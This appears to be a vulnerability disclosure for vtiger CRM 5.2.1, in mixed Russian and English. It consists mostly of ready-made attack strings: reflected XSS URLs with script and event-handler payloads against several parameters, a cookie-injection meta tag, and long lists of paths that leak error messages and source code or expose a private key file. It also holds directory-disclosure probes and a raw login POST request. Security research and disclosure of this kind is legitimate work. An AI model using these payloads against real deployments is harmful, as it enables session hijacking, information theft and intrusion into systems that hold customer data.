vtiger CRM 5.2.1 XSS

XSS

/include/SalesPlatform/NetIDNA/example.php/>"><ScRiPt>alert(14227)</ScRiPt>


decoded

/include/SalesPlatform/NetIDNA/example.php?decoded=%22%20onmouseover%3dprompt%28981290%29%20bad%3d%22&encode=Encode%20%3e%3e&idn_version=2003


encoded

/include/SalesPlatform/NetIDNA/example.php?decode=%3c%3c%20Decode&encoded=%22%20onmouseover%3dprompt%28937322%29%20bad%3d%22


lang


/include/SalesPlatform/NetIDNA/example.php?decode=&encode=&idn_version=&lang=%22%20onmouseover%3dprompt%28959182%29%20bad%3d%22


_operation

/modules/Mobile/index.php?_operation=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28922731%29%3c%2fScRiPt%3e


service

/vtigerservice.php?service=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28945713%29%3c%2fScRiPt%3e



Сообщение об ошибке Application error message

display_errors = 1

/modules/Settings/SettingsAjax.php?announce_save=&file=&orgajax=268435455
/index.php 
/include/HTTP_Session/Session/Container/MDB2.php
/modules/Reports/SaveReport0.php
/cron/modules/PBXManager/AsteriskClient.php
/include/tcpdf/test_old.php
/include/tcpdf/test_unicode.php
/log4php.debug/layouts/LoggerLayoutHtml.php
/log4php.debug/LoggerBasicConfigurator.php
/log4php.debug/LoggerCategory.php
/log4php.debug/LoggerManager.php
/log4php.debug/spi/LoggerLoggingEvent.php
/log4php.debug/xml/LoggerDOMConfigurator.php
/modules/Home/UnifiedSearchModules.php
/modules/Migration/deleteCustomFields.php
/modules/RecycleBin/EmptyRecyclebin.php
/modules/SMSNotifier/sendsmsButton.php
/modules/Users/SaveDefModuleView.php
/modules/Accounts/MailerExport.php 
/modules/Emails/ 
/modules/Emails/index.php 
/modules/Emails/gotodownload.php
/modules/Emails/templates/testemailtemplateusage.php
/modules/Rss/index.php 
/modules/Settings/index.php 
/modules/Settings/SaveAuditTrail.php
/modules/Settings/ModuleManager.php 
/modules/Settings/ModuleManager/Export.php 
/modules/Settings/SaveEnableBackup.php 
/modules/Settings/SettingsAjax.php 
/modules/Webmails/ 
/modules/Webmails/index.php 
/modules/Webmails/ListViewAjax.php 
/Popup.php 
/vtigerservice.php 


Раскрытие исходного кода Source code disclosure


/cron/MailScanner.service
/cron/modules/com_vtiger_workflow/com_vtiger_workflow.service
/cron/modules/SalesOrder/RecurringInvoice.service
/cron/modules/VtigerBackup/VtigerBackup.service
/cron/README-NewCronServiceSetup.txt
/include/ComboStrings.php_TODO
/include/events/include.inc
/include/events/SqlResultIterator.inc
/include/events/VTEntityData.inc
/include/events/VTEntityType.inc
/include/events/VTEventHandler.inc
/include/events/VTEventsManager.inc
/include/events/VTEventTrigger.inc
/include/events/VTWSEntityType.inc
/include/htmlpurifier/INSTALL
/include/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.txt
/include/magpierss/rss_cache.inc
/include/magpierss/rss_fetch.inc
/include/magpierss/rss_parse.inc
/include/magpierss/rss_utils.inc
/include/phputf8/README
/include/prototype-1.4.0/src/HEADER
/include/SalesPlatform/NetIDNA/ReadMe.txt
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/app/TeX/cjk-latex-config
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/app/TeX/sfd2map
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/other/cntstems.pl
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/other/lst.pl
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/other/showdf
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/other/showg
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/scripts/forceiso
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/scripts/frommap
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/scripts/html2man
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/scripts/inst_dir
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/scripts/t1fdir
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/scripts/trans
/modules/com_vtiger_workflow/include.inc
/modules/com_vtiger_workflow/tasks/VTChangeFieldValueTask.inc
/modules/com_vtiger_workflow/tasks/VTChangeOwnerTask.inc
/modules/com_vtiger_workflow/tasks/VTCreateEntityTask.inc
/modules/com_vtiger_workflow/tasks/VTCreateEventTask.inc
/modules/com_vtiger_workflow/tasks/VTCreateTodoTask.inc
/modules/com_vtiger_workflow/tasks/VTDummyTask.inc
/modules/com_vtiger_workflow/tasks/VTEmailTask.inc
/modules/com_vtiger_workflow/tasks/VTEntityMethodTask.inc
/modules/com_vtiger_workflow/tasks/VTRepeatableTask.inc
/modules/com_vtiger_workflow/tasks/VTSMSTask.inc
/modules/com_vtiger_workflow/VTConditionalExpression.inc
/modules/com_vtiger_workflow/VTEmailRecipientsTemplate.inc
/modules/com_vtiger_workflow/VTEntityCache.inc
/modules/com_vtiger_workflow/VTEntityMethodManager.inc
/modules/com_vtiger_workflow/VTEventHandler.inc
/modules/com_vtiger_workflow/VTJsonCondition.inc
/modules/com_vtiger_workflow/VTSimpleTemplate.inc
/modules/com_vtiger_workflow/VTTaskManager.inc
/modules/com_vtiger_workflow/VTTaskQueue.inc
/modules/com_vtiger_workflow/VTWorkflowApplication.inc
/modules/com_vtiger_workflow/VTWorkflowManager.inc
/modules/com_vtiger_workflow/VTWorkflowTemplateManager.inc
/modules/FieldFormulas/expression_engine/include.inc
/modules/FieldFormulas/expression_engine/VTExpressionEngine.inc
/modules/FieldFormulas/expression_engine/VTExpressionEvaluater.inc
/modules/FieldFormulas/expression_engine/VTParser.inc
/modules/FieldFormulas/expression_engine/VTTokenizer.inc
/modules/FieldFormulas/include.inc
/modules/FieldFormulas/VTFieldFormulasEventHandler.inc
/modules/FieldFormulas/VTModuleExpressionsManager.inc
/modules/Migration/ResetPassword.phpfile
/modules/Users/ShowHistory.html
/vtlib/thirdparty/parser/feed/simplepie.inc


Private key file
/include/tcpdf/tcpdf.pem


Раскрытие директорий



/include/HTTP_Session/Session/Container/MDB2.php
/modules/Reports/SaveReport0.php

/cron/modules/PBXManager/AsteriskClient.php
/modules/Emails/gotodownload.php
/modules/Emails/gotodownload.php?msgno=&download=test@himic.ru&file=test@himic.ru
/modules/Emails/gotodownload.php?msgno=test@himic.ru&download=&file=test@himic.ru
/modules/Emails/gotodownload.php?msgno=test@himic.ru&download=test@himic.ru&file=
/modules/Settings/SaveEnableBackup.php?enable_ftp_backup=&GetBackupDetail=test@himic.ru&enable_local_backup=test@himic.ru
/modules/Settings/SaveEnableBackup.php?enable_ftp_backup=test@himic.ru&GetBackupDetail=&enable_local_backup=test@himic.ru
/modules/Settings/SaveEnableBackup.php?enable_ftp_backup=test@himic.ru&GetBackupDetail=test@himic.ru&enable_local_backup=
/vtigerservice.php?service=wordplugin&wsdl=
/vtigerservice.php?service=wordplugin&fieldval=&wsdl=test@himic.ru


POST /index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.11
Host: .ru
Content-Length: 203
Cookie: PHPSESSID=99ddd77ca31c62947912c713bda69b09
Connection: Close
Pragma: no-cache

module=268435455&action=Authenticate&return_module=Users&return_action=Login&user_name=test@himic.ru&user_password=test@himic.ru&login_theme=alphagrey&login_language=en_us


Cookie manipulation

/modules/Mobile/index.php?_operation=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>

  • 0

Нет комментариев